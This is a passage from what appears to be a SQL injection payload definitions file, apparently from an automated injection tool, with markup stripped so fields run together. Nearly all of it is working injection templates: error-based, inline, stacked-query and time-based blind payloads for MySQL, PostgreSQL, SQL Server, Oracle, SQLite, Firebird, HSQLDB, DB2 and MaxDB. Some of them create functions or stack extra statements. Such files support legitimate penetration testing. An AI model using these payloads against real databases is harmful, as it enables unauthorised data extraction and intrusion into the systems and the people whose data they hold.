[RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a),(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]MySQL>= 5.0MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (EXTRACTVALUE)2302,31,EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')),EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]MySQL>= 5.1MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (UPDATEXML)2402,31,UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1]),UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1])[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]MySQL>= 5.1PostgreSQL error-based - GROUP BY and ORDER BY clauses2302,31,(CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)),(CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]PostgreSQLMicrosoft SQL Server/Sybase error-based - ORDER BY clause23031,(CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))),(CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]Microsoft SQL ServerSybaseWindowsOracle error-based - GROUP BY and ORDER BY clauses2302,31,(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL),(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]OracleMySQL inline queries6111,2,3,83(SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))(SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]MySQLPostgreSQL inline queries6111,2,3,83(SELECT '[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]')(SELECT '[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]')[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]PostgreSQLMicrosoft SQL Server/Sybase inline queries6111,2,3,83(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]Microsoft SQL ServerSybaseWindowsOracle inline queries6111,2,3,83(SELECT ('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') FROM DUAL)(SELECT '[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]' FROM DUAL)[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]OracleSQLite inline queries6111,2,3,83SELECT '[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]'SELECT '[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))||'[DELIMITER_STOP]'[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]SQLiteFirebird inline queries6211,2,3,83SELECT '[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]' FROM RDB$DATABASESELECT '[DELIMITER_START]'||(CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END)||'[DELIMITER_STOP]' FROM RDB$DATABASE[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]FirebirdMySQL > 5.0.11 stacked queries41001; SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]); SELECT SLEEP([SLEEPTIME])-- MySQL> 5.0.11MySQL < 5.0.12 stacked queries (heavy query)42201; SELECT IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM]); SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))-- MySQLPostgreSQL > 8.1 stacked queries41001; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END); SELECT PG_SLEEP([SLEEPTIME])--PostgreSQL> 8.1PostgreSQL stacked queries (heavy query)42201; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END); SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)--PostgreSQLPostgreSQL < 8.2 stacked queries (Glibc)44001; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END); CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep([SLEEPTIME])--PostgreSQL< 8.2LinuxMicrosoft SQL Server/Sybase stacked queries41001; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'; WAITFOR DELAY '0:0:[SLEEPTIME]'--Microsoft SQL ServerSybaseWindowsOracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE)45001; SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL; SELECT DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) FROM DUAL--OracleOracle stacked queries (heavy query)45201; SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL; SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5--OracleOracle stacked queries (DBMS_LOCK.SLEEP)45001; BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END; BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END--OracleOracle stacked queries (USER_LOCK.SLEEP)45001; BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END; BEGIN USER_LOCK.SLEEP([SLEEPTIME]); END--OracleSQLite > 2.0 stacked queries (heavy query)43201; SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END); SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))--SQLite> 2.0Firebird stacked queries (heavy query)43201; SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) FROM RDB$DATABASE; SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4--Firebird>= 2.0HSQLDB >= 1.7.2 stacked queries43001;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) END;CALL REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL)--HSQLDB>= 1.7.2HSQLDB >= 2.0 stacked queries44001;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) END;CALL REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)--HSQLDB>= 2.0MySQL > 5.0.11 AND time-based blind5111,2,31AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])AND SLEEP([SLEEPTIME])MySQL> 5.0.11MySQL > 5.0.11 AND time-based blind (comment)5411,2,31AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])AND SLEEP([SLEEPTIME])#MySQL> 5.0.11MySQL < 5.0.12 AND time-based blind (heavy query)5221,2,31AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))MySQLMySQL < 5.0.12 AND time-based blind (heavy query - comment)5521,2,31AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))#MySQLPostgreSQL > 8.1 AND time-based blind5111,2,31AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))PostgreSQL> 8.1PostgreSQL > 8.1 AND time-based blind (comment)5511,2,31AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))--PostgreSQL> 8.1PostgreSQL AND time-based blind (heavy query)5321,2,31AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))PostgreSQLPostgreSQL AND time-based blind (heavy query - comment)5521,2,31AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))--PostgreSQLMicrosoft SQL Server/Sybase time-based blind51001IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'WAITFOR DELAY '0:0:[SLEEPTIME]'--Microsoft SQL ServerSybaseWindowsMicrosoft SQL Server/Sybase AND time-based blind (heavy query)5221,2,31AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)AND [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)Microsoft SQL ServerSybaseWindowsMicrosoft SQL Server/Sybase AND time-based blind (heavy query - comment)5521,2,31AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)AND [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)--Microsoft SQL ServerSybaseWindowsOracle AND time-based blind5111,2,31AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])OracleOracle AND time-based blind (comment)5511,2,31AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])--OracleOracle AND time-based blind (heavy query)5221,2,31AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)AND [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)OracleOracle AND time-based blind (heavy query - comment)5521,2,31AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)AND [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--OracleSQLite > 2.0 AND time-based blind (heavy query)53211AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))SQLite> 2.0SQLite > 2.0 AND time-based blind (heavy query - comment)55211AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))--SQLite> 2.0Firebird AND time-based blind (heavy query)54211AND [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])AND [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)Firebird>= 2.0Firebird AND time-based blind (heavy query - comment)55211AND [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])AND [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)--Firebird>= 2.0SAP MaxDB AND time-based blind (heavy query)5321,2,31AND [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)AND [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)SAP MaxDBSAP MaxDB AND time-based blind (heavy query - comment)5521,2,31AND [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)AND [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)--SAP MaxDBIBM DB2 AND time-based blind (heavy query)5321,2,31AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)IBM DB2IBM DB2 AND time-based blind (heavy query - comment)5521,2,31AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)--IBM DB2HSQLDB >= 1.7.2 AND time-based blind (heavy query)5421,2,31AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' ENDAND '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL)HSQLDB>= 1.7.2HSQLDB >= 1.7.2 AND time-based blind (heavy query - comment)5521,2,31AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' ENDAND '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL)--HSQLDB>= 1.7.2HSQLDB > 2.0 AND time-based blind (heavy query)5421,2,31AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' ENDAND '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)HSQLDB> 2.0HSQLDB > 2.0 AND time-based blind (heavy query - comment)5521,2,31AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' ENDAND '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)--HSQLDB> 2.0MySQL > 5.0.11 OR time-based blind5231,2,32OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])OR [RANDNUM]=SLEEP([SLEEPTIME])MySQL> 5.0.11MySQL < 5.0.12 OR time-based blind (heavy query)5431,2,32OR [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])OR [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))MySQLPostgreSQL > 8.1 OR time-based blind5331,2,32OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)OR [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))PostgreSQL> 8.1PostgreSQL OR time-based blind (heavy query)5431,2,32OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)OR [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))PostgreSQLMicrosoft SQL Server/Sybase OR time-based blind (heavy query)5331,2,32OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)OR [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)Microsoft SQL ServerSybaseWindowsOracle OR time-based blind5331,2,32OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)OR [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])OracleOracle OR time-based blind (heavy query)5431,2,32OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)OR [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)OracleSQLite > 2.0 OR time-based blind (heavy query)54312OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)OR [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))SQLite> 2.0Firebird OR time-based blind (heavy query)55312OR [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])OR [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)Firebird>= 2.0SAP MaxDB OR time-based blind (heavy query - comment)5431,2,32OR [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)OR [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)SAP MaxDBIBM DB2 OR time-based blind (heavy query)5431,2,32OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)IBM DB2HSQLDB >= 1.7.2 OR time-based blind (heavy query)5421,2,31OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' ENDOR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL)HSQLDB>= 1.7.2HSQLDB >= 1.7.2 OR time-based blind (heavy query - comment)5521,2,31OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' ENDOR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL)--HSQLDB>= 1.7.2HSQLDB > 2.0 OR time-based blind (heavy query)5421,2,31OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' ENDOR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)HSQLDB> 2.0HSQLDB > 2.0 OR time-based blind (heavy query - comment)5521,2,31OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' ENDOR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)--HSQLDB> 2.0MySQL >= 5.0 time-based blind - Parameter replace5311,2,33(SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))MySQL>= 5.0MySQL < 5.0 time-based blind - Parameter replace (heavy queries)5421,2,33(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))MySQLMySQL time-based blind - Parameter replace (bool*int)5411,2,33([INFERENCE])*SLEEP([SLEEPTIME])([RANDNUM]=[RANDNUM])*SLEEP([SLEEPTIME])MySQLMySQL time-based blind - Parameter replace (MAKE_SET)5511,2,33MAKE_SET([INFERENCE],SLEEP([SLEEPTIME]))MAKE_SET([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))MySQLMySQL time-based blind - Parameter replace (ELT)5511,2,33ELT([INFERENCE],SLEEP([SLEEPTIME]))ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))MySQLPostgreSQL > 8.1 time-based blind - Parameter replace5311,2,33(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))PostgreSQL> 8.1PostgreSQL time-based blind - Parameter replace (heavy query)5421,2,33(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))PostgreSQLMicrosoft SQL Server/Sybase time-based blind - Parameter replace5311,33(SELECT (CASE WHEN ([INFERENCE]) THEN WAITFOR DELAY '0:0:[SLEEPTIME]' ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN WAITFOR DELAY '0:0:[SLEEPTIME]' ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))Microsoft SQL ServerSybaseWindowsMicrosoft SQL Server/Sybase time-based blind - Parameter replace (heavy queries)5421,33(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END))(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END))Microsoft SQL ServerSybaseWindowsOracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP)5301,33BEGIN IF ([INFERENCE]) THEN 